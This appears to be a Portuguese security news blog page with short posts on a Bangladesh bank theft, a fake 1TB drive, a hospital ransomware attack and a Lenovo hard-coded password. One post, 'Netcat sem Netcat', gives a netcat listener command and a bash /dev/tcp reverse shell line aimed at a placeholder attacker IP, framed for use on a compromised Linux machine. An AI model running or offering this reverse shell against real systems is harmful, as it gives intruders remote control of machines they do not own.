Hackers roubaram 80 milhões de dólares de um banco que não tinha firewall

bank-firewall

Os investigadores do instituto de treinamento de forense de Bangladesh que estão investigando um roubo de 80 milhões de dólares de um banco, descobriram que os hackers conseguiram acesso a rede não pelo fato de eles terem conseguindo dar bypass no sistema de segurança do banco, mas sim pelo fato de que o banco estava usando switches de rede sem nenhum tipo de firewall. Quando você pensa que já viu de tudo…

Leia a materia na integra em: http://thehackernews.com/2016/04/bank-firewall-security.html

Usuário compra HD externo de 1TB da china que tem apenas 32GB de espaço

Se você comprou um disco rígido de 1 TB da China, é melhor você abrir para saber o que tem lá dentro. O usuário kingruudz do reddit.com descobriu que ele foi enganado por uma empresa chinesa que disse ter enviado um disco rígido de 1TB que na verdade tinha apenas 32GB de espaço. A foto abaixo mostra a gambiarra.

O post original pode ser visto em: https://www.reddit.com/r/funny/comments/47c2qe/when_you_buy_a_1tb_hard_disk_from_china_but_its/

Você conhece Hackerville?

Caso você nunca tenho ouvido falar de um lugar na Romênia chamado de Hackerville, o vídeo abaixo vai lhe explicar porque esse lugar ficou conhecido com esse nome. O vídeo foi feito pela Symantec.

Ransomware Proof of Concept dando Bypass no antivírus do windows

3 milhões de dólares em bitcoins

Mais uma vez o vírus ransomware ganhou destaque nas manchetes. Dessa vez o alvo foi o hospital The Hollywood Presbyterian Medical Center localizado em Los Angeles, eles tiveram seus dados criptografados e agora não conseguem acessar dados importantes de seus pacientes. Para liberar a senha que será usada para descriptografar esses dados os hackers estão pedindo uma bagatela de 3 milhões de dólares como resgate. Apesar do estrago que esses ransomware vem causando, a prevenção é muito simples: NÃO CLIQUE NAQUILO QUE VOCÊ NÃO SABE A PROCEDÊNCIA !!!!

P.S: Grandes sites como CNBC e a afiliada da NBC em Los Angeles reportaram que o valor do resgate foi de 3.7 milhões de dólares, sites menores estão dizendo que o valor não passou de 17 mil dólares. O próprio hospital emitiu uma nota dizendo que o valor pago pelo resgate foi de 17 mil dólares. O valor real pago ninguém sabe, o hospital pode ter emitido essa nota com valor inferior até mesmo para não incentivar outros ataques.

Netcat sem Netcat no linux

Por acaso você já conseguiu acesso a uma máquina rodando linux e ai você tentou rodar o netcat para fazer um shell reverso, mas se deparou por exemplo com o fato de que a máquina alvo não tinha o netcat instalado ou de repente você tentou instala-lo mas por algum motivo ele não funcionou?
Bom como todos sabemos geralmente ambientes linux tem o netcat instalado por padrão, mas você pode acabar se deparando com alguma máquina que esteja rodando linux mas não tem o netcat instalado. Os motivos para tal podem ser os mais diversos possíveis. Bom independente de qualquer coisa não se preocupe, existe diversas maneiras de usarmos o netcat sem ter o netcat instalado na máquina alvo. Abaixo segue uma das maneiras com que podemos fazer isso.
Bom a primeira coisa que precisamos fazer é rodar o netcat na nossa máquina e coloca-lo em em listen mode ou modo de escuta, para isso utilizamos o seguinte comando:

nc -n -v -l -p porta-desejada

Agora na máquina alvo utilizamos o seguinte comando:

/bin/bash -i > /dev/tcp/ip-da-máquina-do-atacante/porta-na-qual-o-necat-está-ouvindo-na-máquina-do-atacante 0<&1

O camando acima vai fazer com que a máquina alvo se conecte na máquina do atacante. Vale lembrar que o comando acima pode não funcionar em todas as distribuições linux, caso isso ocorra se vire nos 30.

Não sabe quem é esse tal de netcat? Well google it.

Lenovo protege sua segurança com a senha “12345678” no ShareIt

O que você espera de um gigante da tecnologia para proteger a segurança do seu serviço SHAREit? com algum tipo de proteção correto?
Mas e se essa proteção for uma senha, e mais ainda, e se a senha for nada mais nada menos que “12345678” que vem hard-coded no software?

Leia mais